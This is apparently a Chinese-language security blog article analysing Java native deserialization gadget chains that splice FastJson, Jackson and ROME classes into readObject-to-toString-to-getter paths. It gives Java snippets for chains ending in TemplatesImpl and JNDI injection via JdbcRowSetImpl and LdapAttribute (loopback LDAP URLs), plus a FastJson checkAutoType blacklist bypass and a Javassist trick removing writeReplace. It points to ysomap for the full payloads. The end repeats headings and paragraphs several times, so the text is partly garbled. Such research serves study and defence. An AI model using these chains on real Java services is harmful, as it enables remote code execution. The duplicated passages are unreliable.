利用特殊反序列化组件攻击原生反序列化入口技术分析<\/h1>

前言<\/h2>
本文探讨如何利用特殊反序列化组件（FastJson、Jackson、ROME）攻击Java原生反序列化入口（Serializable接口）。这种攻击的本质是将这些组件中的类拼接到反序列化利用链中，目标是Serializable入口而非特殊反序列化入口本身。<\/p>

攻击原理<\/h2>

特殊反序列化组件在实现自己的序列化逻辑时，会调用目标类的getter方法：<\/p>

这些组件的类（如JSONObject、POJONode、ToStringBean）重写了toString方法<\/li>
在toString方法中会调用目标类（如TemplatesImpl）的getter方法<\/li>

目标类被放入这些组件类中（如

jsonObject1.put("g",obj)<\/code>或new ToStringBean(obj.getClass(),obj)<\/code>）<\/li>
<\/ol>
关键点：<\/p>

目标类getter包括：TemplatesImpl#getOutputProperties<\/code>、LdapAttribute#getAttributeDefinition<\/code>、JdbcRowsetImpl#getDatabaseMetaData<\/code><\/li>
因为是原生反序列化攻击，所有利用链上的类都必须实现Serializable接口<\/li>
<\/ul>
利用链分析<\/h2>
readObject() -> 任意类toString()<\/h3>
1. HotSwappableTargetSource & XString<\/h4>
依赖SpringAOP，测试代码如下：<\/p>
Object templatesimpl =<\/span> null<\/span>;<\/span>
<\/span><\/span>JSONObject jsonObject =<\/span> new<\/span> JSONObject();<\/span>
<\/span><\/span>jsonObject.<\/span>put<\/span>(<\/span>"g"<\/span>,<\/span>"m"<\/span>);<\/span>
<\/span><\/span>JSONObject jsonObject1 =<\/span> new<\/span> JSONObject();<\/span>
<\/span><\/span>jsonObject1.<\/span>put<\/span>(<\/span>"g"<\/span>,<\/span>templatesimpl);<\/span>
<\/span><\/span>
<\/span><\/span>HotSwappableTargetSource v1 =<\/span> new<\/span> HotSwappableTargetSource(<\/span>jsonObject);<\/span>
<\/span><\/span>HotSwappableTargetSource v2 =<\/span> new<\/span> HotSwappableTargetSource(<\/span>new<\/span> XString(<\/span>"x"<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span>Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>v1,<\/span>v1);<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>v2,<\/span>v2);<\/span>
<\/span><\/span>setValue(<\/span>v1,<\/span>"target"<\/span>,<\/span>jsonObject1);<\/span>
<\/span><\/span><\/code><\/pre>调用栈：<\/p>

XString#equals<\/code>中调用obj2.toString()<\/code><\/li>
obj2<\/code>即HotSwappableTargetSource<\/code>中的templatesimpl<\/code>对象<\/li>
<\/ol>
2. BadAttributeValueExpException<\/h4>
JDK原生可用，直接调用内部对象的toString：<\/p>
Object tpl =<\/span> null<\/span>;<\/span>
<\/span><\/span>JSONObject jsonObject =<\/span> new<\/span> JSONObject();<\/span>
<\/span><\/span>jsonObject.<\/span>put<\/span>(<\/span>"gg"<\/span>,<\/span>tpl);<\/span>
<\/span><\/span>BadAttributeValueExpException poc =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>Field val =<\/span> Class.<\/span>forName<\/span>(<\/span>"javax.management.BadAttributeValueExpException"<\/span>).<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>val.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>val.<\/span>set<\/span>(<\/span>poc,<\/span>jsonObject);<\/span>
<\/span><\/span><\/code><\/pre>3. EqualsBean<\/h4>
依赖ROME（1.12.0之前版本可用）：<\/p>
ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>EqualsBean equalsBean =<\/span> new<\/span> EqualsBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span>toStringBean);<\/span>
<\/span><\/span>Object templatesimpl =<\/span> null<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span>Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>equalsBean,<\/span>"123"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Field field =<\/span> toStringBean.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"obj"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>field.<\/span>set<\/span>(<\/span>toStringBean,<\/span>templatesimpl);<\/span>
<\/span><\/span><\/code><\/pre>toString() -> sink<\/h3>
1. TemplatesImpl#getOutputProperties<\/h4>
JDK原生可用，经典CC\/CB链中的利用方式。<\/p>
2. JdbcRowSetImpl#getDatabaseMetaData<\/h4>
JDK原生可用，实现JNDI注入：<\/p>
JdbcRowSetImpl jdbcrowsetimpl =<\/span> new<\/span> JdbcRowSetImpl();<\/span>
<\/span><\/span>String url =<\/span> "ldap:\/\/127.0.0.1:10990"<\/span>;<\/span>
<\/span><\/span>jdbcRowset.<\/span>setDataSourceName<\/span>(<\/span>url);<\/span>
<\/span><\/span><\/code><\/pre>3. LdapAttribute#getAttributeDefinition<\/h4>
JDK原生可用，实现JNDI注入：<\/p>
Object obj =<\/span> newInstance(<\/span>"com.sun.jndi.ldap.LdapAttribute"<\/span>,<\/span> new<\/span> Class<?>[]{<\/span>String.<\/span>class<\/span>},<\/span>"id"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "baseCtxURL"<\/span>,<\/span> "ldap:\/\/127.0.0.1:13562"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>obj,<\/span> "rdn"<\/span>,<\/span> new<\/span> CompositeName(<\/span>"whocansee"<\/span>+<\/span>"\/\/b"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>序列化逻辑分析<\/h2>
FastJson<\/h3>
黑名单检查与绕过<\/h4>
FastJson 1.2.49+在JsonObject的readObject方法中会进行checkAutoType检查。绕过方法：<\/p>
HashMap hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>tpl,<\/span>poc);<\/span> \/\/ tpl是目标类对象，poc是入口类对象
<\/span><\/span><\/span><\/code><\/pre>原理：序列化时先建立外层Map中目标类对象的引用映射，反序列化时恢复JsonObject中的目标类对象会以引用类型写入，绕过resolveClass检查。<\/p>
默认构造方法的必要性及其破除<\/h4>
当目标类不存在默认构造方法时，会报错。解决方法：<\/p>

引用类型绕过（同上）<\/li>
缓存：利用FastJson的缓存机制，提前将类加入缓存<\/li>
<\/ol>
Jackson<\/h3>
getter调用顺序不稳定<\/h4>
Jackson在调用getter时顺序不稳定，可能导致在调用目标getter前就报错。解决方法：<\/p>

使用@JsonIgnore<\/code>注解忽略无关getter<\/li>
使用@JsonPropertyOrder<\/code>指定getter顺序<\/li>
<\/ul>
删除writeReplace方法<\/h4>
Jackson的POJONode类有writeReplace方法，会导致序列化报错。解决方法：<\/p>
CtClass ctClass =<\/span> ClassPool.<\/span>getDefault<\/span>().<\/span>get<\/span>(<\/span>"com.fasterxml.jackson.databind.node.BaseJsonNode"<\/span>);<\/span>
<\/span><\/span>CtMethod writeReplace =<\/span> ctClass.<\/span>getDeclaredMethod<\/span>(<\/span>"writeReplace"<\/span>);<\/span>
<\/span><\/span>ctClass.<\/span>removeMethod<\/span>(<\/span>writeReplace);<\/span>
<\/span><\/span>ctClass.<\/span>toClass<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>ROME<\/h3>
TemplatesImpl利用<\/h4>
ROME结合TemplatesImpl时，可以指定从接口获取getter：<\/p>
ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span>templatesimpl);<\/span>
<\/span><\/span><\/code><\/pre>JdbcRowSetImpl利用<\/h4>
ROME可以结合JdbcRowSetImpl使用，因为getter调用顺序随机，有可能直接调用到getDatabaseMetaData()。<\/p>
LdapAttribute利用问题<\/h4>
ROME无法结合LdapAttribute使用，因为LdapAttribute的get方法会导致PropertyDescriptor报错。<\/p>
1.12.0后的修复<\/h4>
1.12.0版本后：<\/p>

构造方法改为private<\/li>
toString方法改为静态方法，需要传入beanClass和obj参数

这使得攻击难以实现。<\/li>
<\/ol>
工具实现<\/h2>
所有payload可在ysomap<\/a>项目中找到。<\/p>
参考<\/h2>

FastJson与原生反序列化分析文章<\/li>
Jackson getter调用顺序问题分析<\/li>
ROME反序列化利用分析<\/li>
<\/ol>

利用特殊反序列化组件攻击原生反序列化入口技术分析<\/h1>

利用链分析<\/h2>

readObject() -> 任意类toString()<\/h3>

toString() -> sink<\/h3>

1. TemplatesImpl#getOutputProperties<\/h4> JDK原生可用，经典CC\/CB链中的利用方式。<\/p>

序列化逻辑分析<\/h2>

FastJson<\/h3>

Jackson<\/h3>

ROME<\/h3>

JdbcRowSetImpl利用<\/h4> ROME可以结合JdbcRowSetImpl使用，因为getter调用顺序随机，有可能直接调用到getDatabaseMetaData()。<\/p>

LdapAttribute利用问题<\/h4> ROME无法结合LdapAttribute使用，因为LdapAttribute的get方法会导致PropertyDescriptor报错。<\/p>

工具实现<\/h2> 所有payload可在ysomap<\/a>项目中找到。<\/p>

参考<\/h2> FastJson与原生反序列化分析文章<\/li> Jackson getter调用顺序问题分析<\/li> ROME反序列化利用分析<\/li> <\/ol>

1. TemplatesImpl#getOutputProperties<\/h4>
JDK原生可用，经典CC\/CB链中的利用方式。<\/p>

JdbcRowSetImpl利用<\/h4>
ROME可以结合JdbcRowSetImpl使用，因为getter调用顺序随机，有可能直接调用到getDatabaseMetaData()。<\/p>

LdapAttribute利用问题<\/h4>
ROME无法结合LdapAttribute使用，因为LdapAttribute的get方法会导致PropertyDescriptor报错。<\/p>

工具实现<\/h2>
所有payload可在ysomap<\/a>项目中找到。<\/p>

参考<\/h2>

FastJson与原生反序列化分析文章<\/li>
Jackson getter调用顺序问题分析<\/li>
ROME反序列化利用分析<\/li> <\/ol>